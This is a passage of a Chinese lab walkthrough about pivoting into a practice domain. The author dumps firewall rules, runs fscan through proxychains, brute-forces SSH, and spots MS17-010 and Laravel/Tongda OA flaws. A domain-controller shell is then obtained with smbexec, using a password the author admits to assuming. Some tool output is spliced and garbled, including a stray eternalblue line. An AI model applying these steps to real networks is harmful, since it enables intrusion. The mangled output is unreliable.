- 192.168.52.0/24 dev eth0 proto kernel scope link src 192.168.52.20
- 192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.10
九、检察 WP
检察官方 WP:- root@ubuntu:~# iptables -L -v -n 2>/dev/null
- Chain INPUT (policy ACCEPT 2829 packets, 279K bytes)
- pkts bytes target prot opt in out source destination
- Chain FORWARD (policy DROP 0 packets, 0 bytes)
- pkts bytes target prot opt in out source destination
- 6009 13M DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
- 6009 13M DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
- 2591 7215K ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
- 179 10740 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
- 3239 6271K ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
- 0 0 DOCKER all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-05384b1b0df2 br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
- 0 0 DOCKER all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-f0d07941b332 br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
- 0 0 DOCKER all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
- 0 0 ACCEPT all -- br-1d665e13ee58 br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
- Chain OUTPUT (policy ACCEPT 2050 packets, 181K bytes)
- pkts bytes target prot opt in out source destination
- Chain DOCKER (4 references)
- pkts bytes target prot opt in out source destination
- 179 10740 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80
- Chain DOCKER-ISOLATION-STAGE-1 (1 references)
- pkts bytes target prot opt in out source destination
- 3239 6271K DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
- 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
- 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
- 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
- 6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
- Chain DOCKER-ISOLATION-STAGE-2 (4 references)
- pkts bytes target prot opt in out source destination
- 0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
- 0 0 DROP all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
- 0 0 DROP all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
- 0 0 DROP all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
- 3239 6271K RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
- Chain DOCKER-USER (1 references)
- pkts bytes target prot opt in out source destination
- 6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
- root@ubuntu:~# ufw status 2>/dev/null
- Status: inactive
- root@ubuntu:~# nft list ruleset 2>/dev/null
- root@ubuntu:~#
好吧,应该是靶场环境的标题(已反馈给棉花糖)
不外打靶场的兴趣恰恰在此。
十、登入域控拿到 Flag
那么,我们“冒充”我们找到了域管的明文暗码,直接实行登入:- proxychains scp -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target /usr/local/bin/fscan root@192.168.52.20:/tmp/
- root@ubuntu:/tmp# ./fscan -h 192.168.93.0/24
- ___ _
- / _ \ ___ ___ _ __ __ _ ___| | __
- / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
- / /_\\_____\__ \ (__| | | (_| | (__| <
- \____/ |___/\___|_| \__,_|\___|_|\_\
- fscan version: 1.8.4
- start infoscan
- (icmp) Target 192.168.93.10 is alive
- (icmp) Target 192.168.93.20 is alive
- (icmp) Target 192.168.93.30 is alive
- (icmp) Target 192.168.93.40 is alive
- [*] Icmp alive hosts len is: 4
- 192.168.93.10:8000 open
- 192.168.93.30:88 open
- 192.168.93.20:8080 open
- 192.168.93.20:1081 open
- 192.168.93.20:1080 open
- 192.168.93.40:445 open
- 192.168.93.30:445 open
- 192.168.93.20:445 open
- 192.168.93.40:139 open
- 192.168.93.30:139 open
- 192.168.93.20:139 open
- 192.168.93.40:135 open
- 192.168.93.30:135 open
- 192.168.93.20:135 open
- 192.168.93.10:22 open
- [*] alive ports len is: 15
- start vulscan
- [*] NetInfo
- [*]192.168.93.30
- [->]DC
- [->]192.168.93.30
- [+] MS17-010 192.168.93.30 (Windows Server 2012 R2 Datacenter 9600)
- [+] MS17-010 192.168.93.40 (Windows 7 Professional 7601 Service Pack 1)
- [*] NetBios 192.168.93.30 [+] DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
- [+] MS17-010 192.168.93.20 (Windows 7 Professional 7601 Service Pack 1)
- [*] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
- [+] InfoScan http://192.168.93.20:8080 [通达OA]
- [*] WebTitle http://192.168.93.10:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.93.10:8000 [Laravel]
- [+] PocScan http://192.168.93.20:8080 tongda-user-session-disclosure
- [+] PocScan http://192.168.93.10:8000 poc-yaml-laravel-cve-2021-3129
- 已完成 14/15 [-] ssh 192.168.93.10:22 root pass@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 14/15 [-] ssh 192.168.93.10:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 14/15 [-] ssh 192.168.93.10:22 root root111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 14/15 [-] ssh 192.168.93.10:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 14/15 [-] ssh 192.168.93.10:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 14/15 [-] ssh 192.168.93.10:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 15/15
- [*] 扫描结束,耗时: 7m15.055664472s
- proxychains scp -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target /usr/local/bin/fscan root@192.168.52.20:/tmp/[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
- [*] Requesting shares on 192.168.93.30.....
- [*] Found writable share ADMIN$
- [*] Uploading file XDDSTHvz.exe
- [*] Opening SVCManager on 192.168.93.30.....
- [*] Creating service fqAv on 192.168.93.30.....
- [*] Starting service fqAv.....[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK[!] Press help for extra shell commands[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK[-] Decoding error detected, consider msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30ning chcp.com at the target,map the result with https://docs.python.org/3/library/codecs.html#standard-encodingsand then execute smbexec.py again with -codec and the corresponding codecMicrosoft Windows [�汾 6.3.9600][-] Decoding error detected, consider msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30ning chcp.com at the target,map the result with https://docs.python.org/3/library/codecs.html#standard-encodingsand then execute smbexec.py again with -codec and the corresponding codec(c) 2013 Microsoft Corporation����������Ȩ����C:\Windows\system32>
免责声明:如果侵犯了您的权益,请联系站长及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金. |
发表于